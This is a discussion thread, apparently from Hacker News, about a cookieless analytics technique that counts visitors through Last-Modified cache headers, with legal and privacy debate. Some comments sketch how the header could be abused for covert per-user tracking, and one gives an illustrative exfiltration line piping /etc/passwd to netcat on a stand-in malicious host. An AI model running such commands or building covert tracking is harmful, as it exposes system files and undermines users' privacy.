Using a date-modified header to detect unique visitors without using cookies
notes.normally.com
notes.normally.com
If a web server wanted to track you, they would just use your IP. This is a clever technical trick to count your number of users without collecting any personal data. I don't understand why that is such a bad thing?
Second, an IP address is not enough, it may change or be shared. The advertisers ‘need’ to track you forever to serve you relevant ads. So they devise all kinds of tricks to do so.
I don’t believe that’s true. To my knowledge, GDPR only treats IP address as personal data if it is associated with actual identifying information (like name or address). Collecting IP address alone, and not associating it with anything else, is completely fine (otherwise nginx and apache's default configs would violate GDPR), and through them basically every website would violate GDPR.
As long as a company is able to keep it a secret, they won’t get caught.
Witness the hundreds of violations of public trust by Facebook:
https://www.independent.co.uk/tech/facebook-app-recording-ca...
The only complete solution is technological!
There is a separate question, of whether consent is implied. If the identifying information is required to provide the user with a service they requested (e.g. a cookie for their online shopping cart), then consent is implied; no need to ask.
When you try to cram a list of 500 "legitimate interests" down my throat, I will consider no interest as legitimate.
No matter what your goals are, you're in an industry that has zero trust these days.
The method described in the article collects no personal data, collects no identifiable data, and is objectively more user-respecting than Google Analytics. But the behavior by people like you will help make sure that these alternatives don't gain traction and Google maintains their monopoly.
All a site has to do is include analytics in its server-side library. And that’s it. Doesnt even need CNAME cloaking. It can send the analytics anywhere.
The thing ITP and others try to stop is tracking users ACROSS sites.
But if you use single-sign-on with FB or any other service, they can get your public photo, name and just find you on faceboon thru some search engine that spidered all profiles.
So if you really want to be anonymous, stop using the single sign on and reusing passwords etc.
(I don't have a horse in this battle - my personal website doesn't have analytics at all.)
In my experience the stalky behaviour doesn't improve the advertising relevance from my PoV, so the fact it means that all that derived information, some of it definitely PII, is out there so should anyone be able to hack into it they could use it for fraudulent purposes (identity theft, spear-fishing my contacts, …), makes the situation lose-lose for me.
It is worse for other people, as they have information that advertisers like to derive that might be extra sensitive. Being white, male, cis, middle-class, ete, with a life not interesting enough for there to be much to convincingly blackmail or threaten me about, living in western Europe, I'm pretty safe, but this can't be said for others especially in certain parts of the world (scarily religious ruled countries with bad records on individual rights, like Qatar and America to give two examples).
If one is worried about blackmail or violence, especially from a government, then one should take precautions beyond complaining about the prevalence of browser cookies. Modern life, carrying a mobile internet device with GPS service, using a credit card, and going to places with security cameras, presents a variety of surveillance methods.
> especially from a government
Where I to live in a regime like I mentioned above, I'd be as worried about vigilantism as much as government action.
> presents a variety of surveillance methods.
Fair point, but I see a difference between choosing to take a risk and companies trying to follow me around whether I want them to it not. Maybe it is my monkey brain that grew up noticeably before such tech was ubiquitous, said brain having been taught that being followed was at best a bit creepy!
To fight the problems posed by ubiquitous corporate and government surveillance, I suggest ubiquitous public surveillance. Like streamers do, but everywhere, all the time, publicly broadcasted. If I get disappeared, at least it'll be televised.
> vigilantism
There's a difference between being embedded in a supportive community, afraid of violence from outsiders, and being embedded in an antagonistic society, afraid of violence from insiders. In the former, ubiquitous public surveillance might help. In the latter, I think there is nothing to do but emigrate.
Ideally, we'd have independent consumer protection entities, either government or private (e.g. German Stiftung Warentest), that would get products from companies to rank and test, so consumers could make actually informed decisions instead of being lured by hyped up advertising claims.
I think any ban like that would have a "I know it when I see it" standard, which isn't wonderful.
Respectfully i feel like this would be like seeing an example of css turning a page blue and claiming the technique is useless for turning the page red because that is not the specific example used.
Technique does not mean precisely what the person was doing just their method. Their technique has very obvious applications to user tracking.
Ignoring risks do not make them go away, it just makes it easier for bad people to exploit them.
The person standing outside Costco is counting people by giving them a colored sticker when they walk through the door. If they show up already having one, the counter issues a different color. Who has the stickers is unknown; only the number of stickers distributed in each color is known.
As has been said, this is not to say the technique couldn't be used for nefarious purposes. In this case, it's not, though.
In addition, your comment shows a severe lack of imagination. Suppose I'm a malicious server who wishes to track users.
* For each new user, select a random "late-modified" date. Now, I can clearly distinguish between multiple different users, because "1985-01-01T00:00:10" is probably the 10th visit from whoever was given "1985-01-01T00:00:00" on their first visit.
* If I have too many users for the above approach to uniquely identify a person, add more cached items. With HTTP/2, both HTTP requests would use the same TCP connection, so I can correlate the requests together.
And, bam. That goes from "useless for trying to distinguish individuals, much less identify them" to a unique identifier stored in the cache invalidation dates.
"Evil tracking companies will do evil things with any protocol features you give them" is already well known and there's not much to say about it that hasn't been said. What OP is actually doing is clever and new to me.
If I post a privilege escalation exploit that allows me to execute "cat /etc/sudoers", and somebody points out that it could also be used to execute "cat /etc/passwd | netcat malicious-remote-server.com", that's an obvious extension of the same technique. This is the same, where the same technique may be used for more intrusive attacks than are performed in the initial proof of concept.
I'm not saying the technique isn't similar: I just object to people dogpiling on OP because other people can and do abuse the same header in nefarious ways. It's not constructive, just a pointless attack on someone who's actually trying to improve privacy.
However, that is only sufficient if you already trust the operator of the server to maintain that same implementation. That may work for some threat models, such as a website that is currently run by a trusted individual that may later be bought by a malicious actor, but it isn't sufficient in all cases. Across the entire ecosystem, there's a sequence of questions that needs to be asked.
1. How would a non-malicious actor implement the proposed system?
2. What is the minimal amount of information that must be provided for a non-malicious actor to benefit from the proposed system?
3. What could a malicious actor do with that minimal amount of information?
4. If a malicious actor could use this information, are there additional steps the user can take to mitigate those effects?
Together, these questions help to predict the effects of the proposed implementation becoming the standard. Applying it to this article:
1. As described in the original post.
2. The browser must cache files according to the cache policy requested, and the browser provides accurate information about its cache for subsequent requests.
3. Answered in previous comments, that malicious actors could use this to reproduce the same information as is stored in cookies.
4. I'm not sure yet, but I'm picturing an approach where the "if-modified-since" header is deliberately varied for some requests, and abnormal results cause the caching policy of that website to be ignored as untrustworthy.
When people try to figure out what malicious acts could be done, it's moving the conversation from the first two questions and toward the last two questions. It isn't malicious, or reading into the original poster's intentions, but is an attempt to predict what malicious actions will eventually occur, and to implement mitigations as soon as possible.
TFA describes a way to provide basic analytics in a way that completely respects the user's privacy. That's a good thing.
You need some kind of identifier to differentiate between different sessions, and the moment you generate that ID, using whatever way, you are tracking user.
Place a cookie HAS_BEEN_ON_SITE=true as soon as someone loads any page.
Voila, your server can now distinguish between users who've been to your site and users who haven't, without being able to tell recurring users apart from each other.
The implementation in the article is fancier, because the cache control headers allow distinguishing this on a page-by-page basis, but it's the same general idea. Don't give the client an ID, just ask the client to tell you if it's been there before.
Only ones that you don't need are ones that are expected functionality of the site, like you don't need to put it for shopping basket
That's just not a real problem to solve. If you don't want to track users just giving each one unique ID is not a problem if you don't store them for future lookup.
The fact remains that from client perspective client have no way of telling whether you track them or not so you can't really prove to user you're not tracking them.
However, it does look like the ePrivacy Regulation will clear this specific case up, at least according to Wikipedia:
> The proposal also clarifies that no consent is needed for non-privacy-intrusive cookies improving internet experience (like to remember shopping cart history) or cookies used by a website to count the number of visitors.
Counting visits is probably still not a fully GDPR-complaint use case, as the server stores data on the client's machine which is indistinguishable from a cookie containing a counter.
First, this data does not and could not be used, if implemented as described in the post, to uniquely identify someone. As such, it is not personal data and not in scope of GDPR.
Second, DPAs have bigger fish to fry.
I'd think a HN user would know that using an IP to track isn't effective.
For most home desktop users, at best, it tracks an individual household, not a person. For corporate users and highly privacy-conscious home users, it's probably completely worthless as VPNs will make everyone come from a single IP.
For mobile users, it's completely worthless. You'd be tracking users of a specific WiFi network. If your phone is connecting via IPv4, then who knows who you're tracking, as phones on a mobile network will share an IP address.
https://superuser.com/questions/1013630/why-does-qatar-use-a...
The craziest was a large multinational corporation that (I guess for security?) changed their egress IP daily. The first three octets remained the same and the fourth was equal to the day of the month UTC. Really screws things up when you use a 14 day rolling window of previous traffic for comparisons.
Any idea what make/model the proxy was?
I believe it was FortiGate but don’t quote me on that.
It also liked to drop idle TCP connections out of its routing table without sending a FIN or RST. HashiCorp Vault, at the time, only used TCP keep-alive and no additional in-band heartbeat mechanism. Naturally, the firewall dropped the idle connection earlier than the default keep-alive interval (which is long…). Additionally, packets sent to an IP-port combo that it didn’t have in its routing table were black holed, without an RST. We had this painful bug to chase where first thing every morning we could read but not write to Vault for a few minutes and then it work fine for the rest of the day without incident.
I left tcpdump running overnight to see it. At night no one was using Vault… first thing in the morning, the first write goes out to the existing (still valid on both sides according to netstat) but just disappears into the ether. Takes a few minutes for the write to timeout (while spamming retries) at which point Vault closed the connection and started a new one. I just about flipped the table over.
Edit: and just like that, Twitter delivers https://twitter.com/substitute/status/1597695409903714304?s=...
And it's set to block games. Ironically, I tried playing minecraft on a library computer and the server connection succeeded. Worst of all, lichess.org is blocked so students have to compete using their LTE network during chess tournaments.
It shows that we have a part private part state owned company employed as sysadmins in our school. They don't really understand the needs of the school.
I personally consider those privacy respecting data collection techniques as a parallel with the development and use of cryptography on the web. In the beginning pretty much no one online used cryptography; later on we started using them but used weak ones ("export" cipher suites for example, or just look at the issues in early protocols like SSL 2.0 or SSL 3.0); nowadays almost everyone uses strong cryptography. Similarly, in the beginning pretty much no one cared about privacy when they did data collection; then we had begun to care more about privacy, but many schemes are easily broken due to for example misguided ideas of anonymization ("anonymization by hashing"), and we are also starting to see the development of newer private information retrieval schemes and differential privacy, etc. Unlike the cynics on this HN thread, I am quite confident that maybe a decade down the road the majority of data collection done by companies will be in a privacy preserving manner. Of course there will be outliers much like there are still websites that don't use https but those will be few and far between.
There are at least three fallacies with stuff like GDPR that trigger anxiety in people by convincing them that they can somehow safeguard their own privacy while surfing hundreds of websites per day, many in other countries. I'm not going to fully discredit them, just give counterexamples:
1) The internet can continue to work without tracking users
- Targeted advertising (can't have both, although I can't say that I'll miss ads)
2) Users care that companies have their personally identifiable information (PII)
- Users care how companies share and abuse their data for profit (they already know they're being tracked if they don't use something like TorBrowser)
3) Privacy protections actually result in privacy
- PRISM and similar will always find you: https://en.wikipedia.org/wiki/List_of_government_mass_survei...
So I view all of this security theater with utter skepticism. I think the only thing that can maybe save us is transparency. Letting users download their data and using the threat of audit to keep internet companies honest:
https://securiti.ai/blog/dsar-rights-and-compliance/
The rest of the squabbling about "no that's PII, you can't save that!" has only resulted in endless nagging and distraction. It's like trying to hide your address from the post office or thinking that your phone number is secret because it's not in the phonebook.
Although I do think it's kind of funny to make big companies feel like they're living under a police state. They'll work tirelessly to undermine these protections, which is why we'll eventually abandon them like we did with prohibition and McCarthyism because they just aren't enforceable when everyone is breaking the law. Or (equally likely) they'll work to bolster these laws to create new markets through power imbalance, ensuring that only the largest companies can meet compliance and smaller companies pay some sort of protection money against the threat of litigation, which opens the door to mass corruption. Both of these scenarios are ugly enough that I think this entire rabbit hole is suspect.
https://www.secjuice.com/etag-entity-tag-tracking/
Has Apple’s ITP closed this particular loophole by ignoring etags in third party iframes and capping them to 7 days etc. ?
It seems browsers will want to restrict ALL first party cookies to 7 days unless the visitor explicitly allows some domain to store their identity.
Frankly speaking, identity can be done better without cookies. Look at Web3 sign-ins, we need something built into the browser and seamless. For now maybe an extension. Then browser makers can have a privacy mode that retires cookies, entirely.
But how are you supposed to do caching without storing and sending identifying data equivalent to cookies?
Thoughts?
You can do exactly the same thing with cookies and they are better for privacy because there's an opt out mechanism. They're how you're supposed to do this sort of thing.
Using a trick like this is no different to cookies in the eyes of the GDPR. So the only reason to use this trick is if you don't want to respect your users' privacy by being able to block cookies.
Just put "visit_count=5" or whatever in a cookie.
I do think this is better for privacy than standard id-based approaches, but the law is very strict. More: https://www.jefftk.com/p/why-so-many-cookie-banners
(Not a lawyer)
The withcabin.com landing page claims you don't need consent banners to use it.
> when the cookie is used “for the sole purpose of carrying out the transmission of a communication over an electronic communications network” (“Exemption A“)
Since the timestamp is no longer used solely for this purpose, you need consent.
This isn't a criticism of the law, I'm just curious what options there could be, because I can't think of any.
Tell them you'd rather make the coffee ;-)
We had a bunch of meetings about this at what essentially amounted to a giant information superhighway billboard company. IIRC someone brought up using cache headers even back then, because it didn't require cookies or javascript, which we couldn't guarantee would be "up to date", this is back in "target IE6, still" days.
As one of my networking friends said, advertisers usually know everything about your metrics, even if you don't. You can't really fudge the numbers in your favor, so raw requests or QPS or whatever ancillary metric would be enough.
the method in the article is defeated by clearing your session when you're done browsing, or using incognito/private browsing tab, as that should mark all "cached" items for deletion.
https://eur-lex.europa.eu/legal-content/EN/ALL/?uri=CELEX:32...
The ePrivacy directive itself has in article 3.1:
This Directive shall apply to the processing of personal data [...]
which would mean it doesnt apply here, as there is no personal data.In practice, I assume this one is for the judges.
Just to give a little more background here.
Cabin doesn't store a row in a database for each visit. It only stores one row, per day per domain. The attributes for that row are simple tally counts - visits, uniques, bounces etc. So no identifier is stored, and the hits go into the tally. We do not store the fact that a user has visited x amount of times. The demo here is to show how the technique works.
Cabin used to detect only the presence of any last-modified date to determine if the visit is unique or not. But extending it to distinguish hits 1,2 and 3 (by adding 1 second to the start of the day) now allows us to count the bounce rates too.
I personally don't have an issue with it, but one thing that might set some of the people here at ease is if you stopped incrementing the timestamp after the second visit.
This would give you three possible states anyone could be in: never visited, visited once, and visited more than once. It's less data, but still enough to give you your bounce rate and your total visits while minimizing the number of boxes you're sorting individual visitors into.
Full text: https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CEL...
Guidance: https://ec.europa.eu/justice/article-29/documentation/opinio...
The GDPR doesn't single out cookies so you can't get around it by using a different storage device.
Quibble: this isn't a GDPR issue, it's an ePrivacy issue. Two different regulations.
I think I would rather use this and rely on the courts to interpret it fairly if it ever came to that, which it won't.
I am all for privacy, use uBO, Firefox Focus / Incognito and Google alternatives. But if I have to consult a lawyer each time I write some code or write up a blog post, I'll take up gardening instead.
Note that their list the GDPR on their "Privacy law compliance" page (https://docs.withcabin.com/privacy.html) but not ePrivacy...
There is already a correct way to tell a browser to tell the server something with each subsequent request: Cookies. Nobody needs to "write some code" here; it's already written. Working around the protocol isn't engineering, it's just lying.
This blog post is just another cynical degredation of trust between users and their browsers, and browers and the servers they talk to. Just another part of HTTP that we can't use for what it was designed for anymore because servers want so desperately to track visitors uniquely and a significant subset of visitors would prefer not to be remembered uniquely.
Though, of course, it doesn’t circumvent any of them. Nobody who firmly rejects cookies is amused, and no court that ever made a cookie-consent law will shrug its shoulders and say “technically it’s not a cookie so I guess they’re in the clear”.
It’s ridiculous to call this privacy friendly, and I think you just like to track your users without asking.
Why not use a cookie?
The problem with this is encoded in the answer to that question. You're being willfully ignorant if you can't see that the answer to that question is: "Because I don't like certain governments, users, and user agents' way of handling cookies (e.g. deleting them, or requiring consent)".
Why not use a cookie? Because then they can't advertise that they don't use cookies. It's like how they put No-GMO label on food that doesn't even have GMO crop varieties. It's meaningless, but people are uneducated on the subject so it sells products.
You could use a cookie here, and you could do it completely legally without requiring consent. The laws don't care about cookies or other technical implementations, they care about tracking. So the reason to use this cache header instead of cookies is simply because people are uniformed on the subject and it sells better this way.
Oh, so they can be craven motherfuckers who abuse protocols for the sake of web analytics. With you so far.
> The laws don't care about cookies or other technical implementations, they care about tracking.
This is flat-out wrong. The law cares about any cookies that aren't strictly necessary for the site's operation. This very well might qualify as a cookie that isn't strictly necessary for the site's operation. It's not implemented as a cookie, but what you say is half right; "the laws don't care about... technical implementations". A judge might not care that you've come up with a clever way of storing your cookie with a different header. It's the same thing as a cookie, and it's not necessary for the site's operation.
This is an analytics service that respects user privacy. We would be wishing them all the success in the world, not criticizing them for not meeting your ridiculous notions of HTTP header purity.
I’m sorry, but “I want to sort of lie” is just not a very compelling reason to me. I guess I just have ridiculously high standards.
User A: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
User A: last-modified: Wed, 30 Nov 2022 00:00:01 GMT
User B: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
User B: last-modified: Wed, 30 Nov 2022 00:00:01 GMT
Next you see: User ?: last-modified: Wed, 30 Nov 2022 00:00:02 GMT
Which user is it?And have you had 2 count of visits, or 3 count? How do you know?
Finally, these aren't really counting visitors, but views, of this URL, by this browser, right?
There's a conventional taxonomy of terms for web stats, something like:
- users (as in MAU)
- visitors or uniques (typically daily uniques)
- visits or sessions (multiple views from one visitor in a cluster)
- views or pageviews (.html pages)
- hits or requests (every object gotten from server: .html, .js, .jpg, etc.)
Looks like your GIST is causing a remote user agent to store a count of its own views.// I haven't tried it, just a quick skim of the blog and the gist, raising this question. I'm probably missing something.
And I think they are only doing it within a single day, not across days.
If you know that someone exists who visited your site 500 times today, but know nothing else about the person, is that a privacy problem?
In this case they don’t do this evil thing, and it probably would still violate the European GDPR, even if it’s not an actual cookie, but somebody has to find it first.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
Fortunately this is probably just as detectable as the Last-Modified abuse in the post.
Another one was the favicon cache.
Pretty much any state on the browser can be used to track people.
Edit: Huh, I stand corrected I don't know if this would count as personal data.
The post says that they don't combine datapoints because that would negate privacy.
Using it for user analytics, which is neither required to run the service, nor in the users interest, nor reasonably expected by the user, is almost definitly illegitimate use.
Using personal data to assign a cohort counts as using personal data. Duh. The approach described in the article doesn't use any personal data, though?
Quoting the European commission:
"Personal data is any information that relates to an identified or identifiable living individual. Different pieces of information, which collected together can lead to the identification of a particular person, also constitute personal data."
I'd hazard a guess that it's the second part under which the EC might find this to be within scope.
That doesn't mean you can't use it at all. It just places strong restrictions on what purpodes you can use it for. The important point is just that those restrictions are the same under GDPR for all of these technologies. It doesn't matter how you uniquely identify users, what matters is what you do with that information.
You may be able to look at the headers and see that a certain user made the most requests that day. That still tells you nothing about their identity.
What the technique may fall foul of, though, are cookie laws.
Early on, it's not personally identifiable. No doubt there can be a lot of folks visiting the site only 10 times and never again.
But as someone continues to visit, they begin to narrow down who they are to "You're that guy that comes in here every day with a yellow hat". They may not "know" who you are but, they "know" who you are.
Eventually, there may be that one person that has the highest hit rate, who always stands out.
Yes but you have absolutely nothing at all to associate that back to a person. Where are you going to find the data "personal information of some kind of the people who visit your site a lot?" You're not collecting it.
They could stop incrementing once they get to 10 (or something that's high but common enough to be shared by 1,000s of people).
You have somehow perverted GDPR to believe it to mean `no client may ever hold a unique state`. Good luck to anyone making a claim that this is NOT possible in anything but the most rudimentary application.
Multiple requests end up with the same time stamp which means individuals are not traceable but as an aggregate countable
Edit: I misread the article here, where it said each visit incremented the counter by one second. So my calculation is not correct!
(edit: spelling)
~Every HTTP response has a Date field with a second-resolution timestamp that might be unique. Are you equally concerned about that?
both you and i visit the same new site today, we both get a file our browser caches with today's date at 00:00:01. Tomorrow when we go to the same site, our browser says we got the file yesterday, so the server sends a new modified date to the browser, set to tomorrow's date at 00:00:02. Both of us have the same "new" file with the new modification date/time.
if i go back the following day, the only thing the server knows for certain, from just this header, is that i've visited twice before. So i'm not counted as a unique visitor.
That this could be used by assigning a unique timestamp to each visitor is where everyone's mind is going, and it feels like half are annoyed there's another way to leak information, and the other half are annoyed they didn't think of it prior to the end-of-year marketing bonus deadline.
However, it sounds like they're using it just for quite minimal tracking. It sounds like the only thing they're tracking is how many people viewed the site how many times. They'll know that on a particular day, 1 person viewed the site 500 times, but won't know anything identifying about that person (e.g. IP, name, gender, any sort of unique ID).
Cookies have built in browser behavior - they have limited scope, the browser lets you see them, they get cleared out regularly.
Abusing metadata is way sketchier.
People kept asking for cookieless tracking but with another way of identifying returning visitors that was always worse from a privacy standpoint. Cookies can be controlled by the client, anything stored on the server can not.
Honestly, cookies are pretty nice, it’s the law around this that sucks. Tricks that attempt to bypass the laws will surely only work for a limited time, at least I hope they will…
- third-party cookie blocking/notification features in browsers
- review processes on ad networks checking for actual cookies rather than suspicious last-modified times
You have 30 million seconds per year as unique identifier to be used against each individual for tracking. Even though the OP didn't do it.
Put an expire time in between 10 years back to today and 300m users tracked.
I would have serious doubts of the longevity of such a trick, let alone some of the technical limitations I am sure the service has.
And before you try the next thing, personal data is everything that can be linked to a specific user, e.g. IP addresses have been ruled to be personal data, some uuid that helps you identify a user as well.
People should really read the law, and/or at least literate commentary on it instead of assuming things or repeating what someone else assumed.
Still, this stores data in the browser in a way that might be deemed a technology similar to a cookie, and therefore this might still fall within the various cookie laws, but this is completely outside of personal data regs.
On the other hand, a cookie or a browser fingerprint contains info that can uniquely identify that user so it can be used for tracking.
In the same way, nothing in their current method necessarily says they couldn't find a way to insert a fingerprint here.
Maybe only one user will have over 100 visits, and then you can uniquely identify them.
If 100 people visited once, and one person visited twice... then a new request with visitCount=3 is that second person.
Your argument seems to be that this timestamp in the header could possibly be used as a lookup key in a database of visitors. I think that's a stretch, but in any case that database would be the privacy violating thing. This header is completely anonymous.
Not like its tracking you across domains and services, more a counter for how many people have visited, and either stayed and looked around, or left.
The same can be said of first-party cookies.
There really is no bottom, is there.
It's comparable to dropping the same cookie to every visitor on a particular day; a pretty low level of privacy invasion.
Also, this allows to not use such things as visitor's IP address to collect meaningful statistics, which is a privacy win for the user, and an accuracy win for the site operator.
It's not tracking users, it's just a special user-identifying operation.
The page lastmodified.normally.com claims "Works in any browser or any server". What if the browser has no Javascript engine.
In this case I tried the demo with a browser that has a JS engine, with JS enabled, and the demo still did not work. That is because "ping.withcabin.com" was not disclosed to the user. The OP suggests that users access "lastmodified.normally.com". It says nothing about accessing "ping.withcabin.com". As such, the proxy does not contain any address info for that domain. The user (me) never typed it.
Instead of a browser, I use a localhost-bound forward proxy to control requests and responses, including HTTP headers. The proxy contains all of the domain-to-IP address mappings I need in memory. Why should I add an IP address for "ping.withcabin.com". The request returns no content.
1. For example, something like
acl cabin hdr(host) -m str ping.withcabin.com
http-request del-header If-Modified-Since if cabin
http-response del-header Cache-Control if cabin
http-response del-header Last-Modified if cabinIn the demo it seems they have XMLHttpRequest code calling ping.withcabin.com/cache for this trick of theirs.
Can this method of counting be made to work without javascript?
Check out a list here: https://amiunique.org/fp
(I would probably go for a Gaussian fuzzer each visit, just because it adds the off chance that it's quite a way away from any attempted ID, making it a little bit more difficult to cast a wider net and get a few bits of entropy)
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
Thinking about this problem, why does the browser expose any information about what's in the cache? Client-side JavaScript can't tell what's in the cache because it's an obvious security issue. Why let the server know?
Browsers should ask for the hashes on a list of content without exposing their cache contents. Then the browser can request anything thats changed.
(Also, in many cases the server uses a hash of the inputs to generating the resource, which isn't something externally verifiable)
(Which is nice computationally, since you can immediately say "not modified" instead of building the response, hashing it, and throwing it away if the hash matches)
And introducing a new method doesn't solve the issue of deprecating the existing abusable methods, which is why I suggested one that can already be implemented by privacy-first browsers one-sidedly. Servers would then be pressured to migrate to some friendly ETag format if they don't want to completely lose client-side caching for a (hopefully growing) share of their userbase.
https://en.wikipedia.org/wiki/HTTP_ETag#Tracking_using_ETags
The differences with a cookie are that the header is named Last-modified instead of Set-Cookie and Cookie, and the value must be a datetime in the RFC2616 format.
How is it good for privacy? I think it’s worse because it’s invisible for the user. I would bet tracking visitors using such an hack isn’t compatible with GDPR, that requires an informed consent for tracking. And good luck explaining your hack to the average visitor.
I assume it will be treated as such, too. If you can use a cookie to do this without consent, this is fine too. If you can't then it's not. The same happens for local/session storage: it's cookie-equivalent.
By that measure, any users behind a unique single IP (no IP pooling, no CGNAT, etc) will always be uniquely identifiable. And for IP there's much fewer steps to personally identify the user. The server necessarily sees the user IP.
The best is to not store them before you get consent. Having a temporary access log with a few IPs is probably fine. But keeping all your access logs forever for analytics purposes is not fine anymore.
> Natural persons may be associated with online identifiers provided by their devices, applications, tools and protocols, such as internet protocol addresses, cookie identifiers or other identifiers such as radio frequency identification tags. This may leave traces which, in particular when combined with unique identifiers and other information received by the servers, may be used to create profiles of the natural persons and identify them.
Member States shall ensure that the storing of information, or the gaining of access to information already stored, in the terminal equipment of a subscriber or user is only allowed on condition that the subscriber or user concerned has given his or her consent, having been provided with clear and comprehensive information, in accordance with Directive 95/46/EC, inter alia, about the purposes of the processing. This shall not prevent any technical storage or access for the sole purpose of carrying out the transmission of a communication over an electronic communications network, or as strictly necessary in order for the provider of an information society service explicitly requested by the subscriber or user to provide the service.
In short, this method may fall under the EU “cookie law” above. The use of timestamps may require consent if they are used to distinguish users (even if only for counting purposes). The timestamps may then also be personal data under the GDPR.
They are counting repeated requests. The unique count then is "total requests" minus "repeated requests".
Wouldn't it be easiser to count the number of times a cached resource is accessed?
This allows site owners get statistics on page views/uniques/bounces without unique identifier cookies or javascript injections.
I’m all for blocking any abusive tracking methods, but this looks to me like creative website statistics that works for single domain. What’s the harm by measuring that?
What’s the motivation to submit to it?
If you can allow them to do that without getting tracked, it’s win-win. You get a better experience when they build a better service.
If I fetch your /foo.html today in November 2022, and you send me a last-modified from 1978, that gives me and my UA a huge range from which to select a different datetime (anywhere between the 1978 value and now-ish) on my next request. How are you going to correlate my original and subsequent requests if in the latter I ask if you've got a copy that's been modified since 1999?
But users go to the web with the browser they've been given.
Apple, famously, forbids its users to speak HTTP with anything else on iOS.
An acceptable response, then (to both you and the original commenter), follows: "While some particular browser version doesn't currently protect individuals from that proposed form of tracking, any browser vendor could trivially start thwarting that form of tracking by exploiting the latitude afforded to UAs by the semantics of these headers." And that's the form that the previous comment takes and how it should be understood. The fact that "users go to the web with the browser they've been given [i.e., today, and which isn't providing this sort of tracking protection]" doesn't change anything; we are explicitly talking about steps that each side _can_ take in the arms race related to the subject of this discussion...
But if you do 1 second granularity a mere 2 cache timestamps are enough to fingerprint everyone on the planet, each day.
is my math wrong, here?
[1]: https://www.privoxy.org/user-manual/actions-file.html#OVERWR...
ubo killed the demo?
What location? The Geolocation API?
What date? How can a date contribute to a UID? Each visitor sends multiple HTTP requests at different dates.
Is it necessary to know how many visits per day a particular user made? If # of unique visitors per day/week/whatever is sufficiently granular you could retain a corresponding cache window.
Also if this is to avoid those cookie warnings that got popular after GDPR, it should be noted you're still storing information on users' computers. i.e. The stuffed metadata is not so different in principle from a cookie. In this case it seems innocuous, but I wouldn't be surprised to see sites exploit your trick to store a unique last-modified date for each user as a method of tracking (if that's not already commonplace).
I think you are right that this technique could be changed and turned into a way to track individual users. But as implemented, it doesn't do that, and all knowledge is lost after one day. We shouldn't criticize people who are trying to limit the information they collect to the bare minimum by pointing out an altered version of their system might have undesirable properties.